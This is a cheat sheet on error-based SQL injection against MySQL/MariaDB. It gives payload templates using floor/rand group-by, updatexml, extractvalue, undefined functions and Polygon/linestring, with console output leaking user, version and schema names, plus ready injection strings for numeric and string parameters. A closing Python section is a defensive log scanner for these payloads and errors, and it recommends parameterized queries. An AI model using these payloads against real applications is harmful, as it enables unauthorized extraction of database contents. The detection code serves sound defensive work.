MySQL Error-Based Injection

1. Triggering an error with floor()

  • Payload template

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
Replace payload with the subquery whose result you want returned in the error.

Note: the output is limited to 64 characters.

Example:

MariaDB [security]> select * from users where id =1 and (select 1 from (select count(*),concat((select user()),floor (rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'
MariaDB [security]>

2. Triggering an error with updatexml()

  • Payload template

and updatexml(1,payload,1)
Replace payload with the subquery whose result you want returned in the error.

Note: the output is length-limited to at most 32 characters.

Example:

MariaDB [security]> select * from users where id =1 and updatexml(1, concat(0x7e,(select version()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.65-MariaDB~'
MariaDB [security]>

3. Triggering an error with extractvalue()

and extractvalue(1, payload)
Replace payload with the subquery whose result you want returned in the error.

Note: the output is length-limited to at most 32 characters.

Example:

MariaDB [security]> select * from users where id =1 and extractvalue(1, concat(0x7e,(select @@version),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~5.5.65-MariaDB~'
MariaDB [security]>

Other error-based methods

  • 1. Leaking the database name with a non-existent function

    When a query calls a user-defined function that does not exist in the current database, the error reports that the function is missing from that database, which reveals the database name.
    MariaDB [security]> select * from users where id =f();
    ERROR 1305 (42000): FUNCTION security.f does not exist
    MariaDB [security]>

    This reveals the database name: security

    MariaDB [security]> select * from users where id = 1 and id = f();
    ERROR 1305 (42000): FUNCTION security.f does not exist
    MariaDB [security]> select * from users where id = 1 or id = f();
    ERROR 1305 (42000): FUNCTION security.f does not exist
    MariaDB [security]>

    payload:
    ---
    Numeric injection: id=f() --+
    String injection (close the quote first): id=1' or id=f()--+
    id=1' and id=f()--+
    ---

  • 2. Leaking table and database names with Polygon / linestring

MariaDB [security]> select * from users where id = 1 and Polygon(id);
ERROR 1367 (22007): Illegal non geometric '`security`.`users`.`id`' value found during parsing
MariaDB [security]> select * from users where id = 1 and linestring(id);
ERROR 1367 (22007): Illegal non geometric '`security`.`users`.`id`' value found during parsing
MariaDB [security]>

Polygon / linestring reveal the table and database name; id must be a column that actually exists in the table, otherwise no error is produced.

  • 3. Error-based double query injection

MariaDB [security]> select * from users where id = 1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1;
ERROR 1062 (23000): Duplicate entry '5.5.65-MariaDB~1' for key 'group_key'
MariaDB [security]>
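As an added defensive example, not part of the original page, the following Python scans application or database log lines for the request-side signatures of the techniques above (floor/rand/group by, updatexml, extractvalue, Polygon/linestring) and for the error messages that hand data back to the caller, reporting what each error exposes. The regexes and sample log lines are constructed here against the exact MariaDB wording shown in the examples.

```python
import re

# Error messages shown on this page that hand data back to the caller; patterns
# follow the MariaDB/MySQL wording in the examples above.
ERROR_PATTERNS = [
    ("floor/group-by duplicate key",
     re.compile(r"ERROR 1062 .*Duplicate entry '(?P<leak>.*)' for key 'group_key'")),
    ("updatexml/extractvalue XPath error",
     re.compile(r"ERROR 1105 .*XPATH syntax error: '(?P<leak>.*)'")),
    ("undefined function (exposes schema name)",
     re.compile(r"ERROR 1305 .*FUNCTION (?P<leak>\w+)\.\w+ does not exist")),
    ("geometry type error (exposes schema.table.column)",
     re.compile(r"ERROR 1367 .*Illegal non geometric '(?P<leak>[^']*)' value")),
]

# Request-side signatures of the same techniques, tolerant of case and spacing.
PAYLOAD_SIGNATURES = [
    ("floor-rand-groupby", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("updatexml", re.compile(r"\bupdatexml\s*\(", re.I)),
    ("extractvalue", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("geometry-func", re.compile(r"\b(polygon|linestring)\s*\(", re.I)),
]

def classify_error(line):
    """Return (technique, exposed_text) if the line is a data-leaking error, else None."""
    for name, pat in ERROR_PATTERNS:
        m = pat.search(line)
        if m:
            return name, m.group("leak")
    return None

def flag_query(sql):
    """Return the names of error-based injection signatures present in a query string."""
    return [name for name, pat in PAYLOAD_SIGNATURES if pat.search(sql)]

def scan_log(lines):
    """Walk log lines and report flagged queries and leaking errors as (kind, name, detail)."""
    findings = []
    for line in lines:
        hit = classify_error(line)
        if hit:
            findings.append(("error", hit[0], hit[1]))
        for sig in flag_query(line):
            findings.append(("query", sig, line.strip()))
    return findings

# Constructed sample lines (not from a real system), mirroring the page's examples.
SAMPLE_LOG = [
    "select * from users where id =1 and updatexml(1, concat(0x7e,(select version()),0x7e),1)",
    "ERROR 1105 (HY000): XPATH syntax error: '~5.5.65-MariaDB~'",
    "ERROR 1305 (42000): FUNCTION security.f does not exist",
]
```

The durable fix is parameterized queries plus generic client-facing error pages; a scanner like this only shows where leaking errors and payload shapes still reach your logs or users.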